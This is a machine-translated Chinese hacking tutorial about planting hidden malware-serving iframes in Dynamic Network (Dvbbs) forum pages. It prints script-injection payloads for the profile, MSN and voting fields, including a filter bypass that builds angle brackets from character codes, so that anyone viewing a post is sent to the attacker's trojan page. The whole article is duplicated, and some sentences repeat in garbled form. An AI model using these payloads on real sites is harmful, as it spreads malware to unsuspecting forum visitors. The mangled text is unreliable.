Author: Yoge GXU Article source: Evil Octal Information Security Team
Article author: Yoge [GXU] ()
Source of information: Evil Octal Information Security Team ()
Original download: /
Some time ago, focn and others discovered the loophole of escalating power in Dynamic Network. This loophole was a huge upside down, and even the Dangdang Network forum was launched. It is this vulnerability that covers other vulnerabilities of Dongwang, making other vulnerabilities of Dongwang less known to everyone.
I believe everyone has read the latest horse-hooking method of the End Network! 》 article, but this loophole has been around for about half a month before it was released later. The method of using it is to write the code into the "personal homepage" in "Modify personal contact methods":
</Script><IfraMe height=0 width=0 src=""></IfraMe>
Write code in MSN:
<Script Language=JavaScript>var actioninfo3='Single Post Blocking'
Among them, * horse. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of horse hanging on the Internet - voting and hanging on the horse. Through testing, it was found that all versions of Dynamic Network have this vulnerability. href="For your web page *. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of hang up on Dongwang - voting hang up on horses. Through the test, we found that all versions of xingwang have this loophole. /" target=_blank> For your web page *. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of horse hanging on the Internet - voting and hanging on the horse. Through testing, it was found that all versions of Dynamic Network have this vulnerability.
First, let's post a vote to see. As shown in Figure 1
Let's take a look at the source file:
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
Among them, sssssssssss is written freely by us, so can we deceive the source file and let it run our code? For example, a bracket: (), when we write it in () and (, then it becomes two brackets. The principle is the same, and we can also cheat code like this. We write in the posting vote:
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='
By the way, the voting function of Dongwang does not undergo strict filtering. When the voting items written are web codes, the code can still be executed, and the code written does not follow what it says, "one voting items per line, up to 10", and there is no branch. After posting a vote, check the source file:
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
The code cannot be executed, and the dynamic network filtered it. Let go of your ideas again, Dongwang only filters < and >, and does not filter symbols such as +'/. Write the code again at the vote:
';=+(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src= width=0'+(62)+(60)+'/IFRAME'+(62);var vote='1
After publishing, I successfully jumped to this site. If we change the site to our web page *, then a * post will be completed like this. In fact, this is just a small part of Dongwang code fraud, and there are still many places where code fraud can be performed, such as user avatars, contact methods, etc.
Postscript: Many program authors have not seen the security harm of code deception. In many website programs I have read, whether it is Asp or PHP, there are many programs that can deceive code. I hope this article can have the effect of throwing bricks and allowing friends to find more loopholes.
Article author: Yoge [GXU] ()
Source of information: Evil Octal Information Security Team ()
Original download: /
Some time ago, focn and others discovered the loophole of escalating power in Dynamic Network. This loophole was a huge upside down, and even the Dangdang Network forum was launched. It is this vulnerability that covers other vulnerabilities of Dongwang, making other vulnerabilities of Dongwang less known to everyone.
I believe everyone has read the latest horse-hooking method of the End Network! 》 article, but this loophole has been around for about half a month before it was released later. The method of using it is to write the code into the "personal homepage" in "Modify personal contact methods":
</Script><IfraMe height=0 width=0 src=""></IfraMe>
Write code in MSN:
<Script Language=JavaScript>var actioninfo3='Single Post Blocking'
Among them, * horse. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of horse hanging on the Internet - voting and hanging on the horse. Through testing, it was found that all versions of Dynamic Network have this vulnerability. href="For your web page *. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of hang up on Dongwang - voting hang up on horses. Through the test, we found that all versions of xingwang have this loophole. /" target=_blank> For your web page *. In this way, when we post or reply, as long as someone visits this post, we will jump to our *. The principle is to deceive the original code. Today, we mainly talk about another method of horse hanging on the Internet - voting and hanging on the horse. Through testing, it was found that all versions of Dynamic Network have this vulnerability.
First, let's post a vote to see. As shown in Figure 1
Let's take a look at the source file:
<Script Language=JavaScript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</Script>
Among them, sssssssssss is written freely by us, so can we deceive the source file and let it run our code? For example, a bracket: (), when we write it in () and (, then it becomes two brackets. The principle is the same, and we can also cheat code like this. We write in the posting vote:
';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='
By the way, the voting function of Dongwang does not undergo strict filtering. When the voting items written are web codes, the code can still be executed, and the code written does not follow what it says, "one voting items per line, up to 10", and there is no branch. After posting a vote, check the source file:
<Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script><iframe src="/" width="0" height="0"></iframe><Script Language=JavaScript>var vote='';var votenum='0';var votetype='0';var voters='0';</Script>
The code cannot be executed, and the dynamic network filtered it. Let go of your ideas again, Dongwang only filters < and >, and does not filter symbols such as +'/. Write the code again at the vote:
';=+(60)+'IFRAME frameBorder=0 height=0 marginHeight=0 marginWidth=0 scrolling=no src= width=0'+(62)+(60)+'/IFRAME'+(62);var vote='1
After publishing, I successfully jumped to this site. If we change the site to our web page *, then a * post will be completed like this. In fact, this is just a small part of Dongwang code fraud, and there are still many places where code fraud can be performed, such as user avatars, contact methods, etc.
Postscript: Many program authors have not seen the security harm of code deception. In many website programs I have read, whether it is Asp or PHP, there are many programs that can deceive code. I hope this article can have the effect of throwing bricks and allowing friends to find more loopholes.